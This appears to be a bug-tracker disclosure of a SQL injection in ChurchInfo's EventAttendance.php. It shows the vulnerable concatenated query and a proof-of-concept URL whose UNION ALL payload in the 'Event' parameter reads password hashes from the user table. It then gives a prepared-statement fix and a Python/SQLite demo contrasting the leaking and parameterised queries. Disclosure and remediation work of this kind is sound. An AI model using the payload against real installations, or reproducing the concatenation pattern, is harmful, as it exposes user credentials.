
#245 Vulnerability: SQL Injection in EventAttendance

Milestone: v1.0_(example)
Status: open
Owner: nobody
Priority: 9
Updated: 2019-01-09
Created: 2019-01-09
Creator: huki45q
Private: No

Proof of Concept

ChurchInfo does not properly validate or encode an HTTP GET parameter when generating reports (Church Service Attendance). The vulnerable code is in the file EventAttendance.php, where the "Event" parameter is concatenated directly into the SQL string:

$sSQL = "SELECT * FROM events_event WHERE event_type = ".$_GET['Event']." ORDER BY event_start";
...
// Get data for the form as it now exists..
$rsOpps = RunQuery($sSQL);
$numRows = mysqli_num_rows($rsOpps);

// Create arrays of the attendees.
for ($row = 1; $row <= $numRows; $row++)
{
    $aRow = mysqli_fetch_assoc($rsOpps);
    extract($aRow);
...

Attack:
The following URL contains malicious SQL in the GET parameter. If it is requested by an (authenticated) user, the response will contain the password hash of a user from the database.

http://localhost/churchinfo/EventAttendance.php?Action=List&Event=3 UNION ALL SELECT usr_Password, usr_Password,usr_Password,usr_Password,usr_Password, usr_Password, usr_Password,usr_Password, usr_Password FROM user_usr&Type=Church Service

The exploit injects an additional SQL query using UNION ALL through the GET parameter "Event". After execution, a password hash from the database is displayed on the web page. In the same way, all other database contents can be read by an attacker.

Fix

To fix this bug, use prepared statements for all database queries in order to prevent SQL injections [1].

For example, the query could be rewritten as ($dbConnection is assumed to be the application's mysqli connection):
$event_type = isset($_GET['Event']) ? $_GET['Event'] : '';   // untrusted input; never concatenated into the SQL string
$statement = $dbConnection->prepare("SELECT * FROM events_event WHERE event_type = ? ORDER BY event_start");
$statement->bind_param('s', $event_type);   // bound as data, so a UNION payload cannot change the query structure
$statement->execute();
$rsOpps = $statement->get_result();          // mysqli_result, usable with mysqli_fetch_assoc() as before
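To show why the parameterised form neutralises the UNION ALL payload described above, here is an added example (not ChurchInfo code) in Python with an in-memory SQLite database standing in for the project's PHP/MySQL stack; the table columns are constructed assumptions, and the payload is the one from the report, adapted to the four-column table used here.

```python
import sqlite3

FAKE_HASH = "CONSTRUCTED-HASH-PLACEHOLDER"   # stands in for a real usr_Password value
# The report's UNION ALL payload, adapted to the four-column table constructed below.
PAYLOAD = ("3 UNION ALL SELECT usr_Password, usr_Password, usr_Password, "
           "usr_Password FROM user_usr")


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for the two tables the report names (columns assumed)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE events_event (event_id INTEGER, event_type INTEGER,
                                   event_title TEXT, event_start TEXT);
        CREATE TABLE user_usr (usr_ID INTEGER, usr_Password TEXT);
        INSERT INTO events_event VALUES (1, 3, 'Sunday Service', '2019-01-06');
    """)
    db.execute("INSERT INTO user_usr VALUES (1, ?)", (FAKE_HASH,))
    return db


def vulnerable_query(db: sqlite3.Connection, event: str) -> list:
    """Concatenation, as in the original EventAttendance.php: the input becomes SQL."""
    sql = ("SELECT * FROM events_event WHERE event_type = " + event
           + " ORDER BY event_start")
    return db.execute(sql).fetchall()


def fixed_query(db: sqlite3.Connection, event: str) -> list:
    """Parameterised form of the same query: the value is bound as data only."""
    sql = "SELECT * FROM events_event WHERE event_type = ? ORDER BY event_start"
    return db.execute(sql, (event,)).fetchall()


def leaked_hashes(rows: list) -> list:
    """Password-hash cells found in a result set; an empty list means no leak."""
    return [cell for row in rows for cell in row if cell == FAKE_HASH]


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, benign input :", vulnerable_query(db, "3"))
    print("vulnerable, payload leaks:", leaked_hashes(vulnerable_query(db, PAYLOAD)))
    print("fixed, benign input      :", fixed_query(db, "3"))
    print("fixed, payload           :", fixed_query(db, PAYLOAD))  # [] because the payload is just a value
```

With the benign value "3" both functions return the same event row; with the payload the concatenated query appends the attacker's SELECT and leaks the hash, while the bound parameter is compared as a single value and matches nothing.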

References

[1] https://www.owasp.org/index.php/SQL_Injection
